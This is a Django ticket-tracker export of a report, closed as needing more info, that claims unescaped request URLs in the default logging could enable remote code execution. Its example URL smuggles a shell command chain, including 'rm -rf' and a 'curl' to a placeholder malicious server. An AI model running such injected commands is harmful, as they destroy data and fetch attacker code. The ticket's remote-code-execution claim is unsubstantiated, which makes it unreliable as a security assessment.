id	summary	reporter	owner	description	type	status	component	version	severity	resolution	keywords	cc	stage	has_patch	needs_docs	needs_tests	needs_better_patch	easy	ui_ux
33610	Django does not escape the request url in default logging mechanism and may be vulnerable to remote code execution	DJD	nobody	"**Issue**:

When logging is enabled in Django, the log_response method in log.py of the django.utils package logs the given URL in the log file as is, without escaping it, which may lead to remote code execution.

**For example:**
An attacker hits the Django project with this URL: <hostname>/cgi-bin;cd /var/temp;rm -rf <any folder>; curl <malicious remote server url>

In this case we can see the log file entry with a warning (yes, because of the 404 Not Found error the level is warning) containing the given URL as it is. IMHO we should escape the request/response logging so as to minimise the remote code execution possibilities"	Bug	closed	Utilities	4.0	Normal	needsinfo			Unreviewed	0	0	0	0	0	0
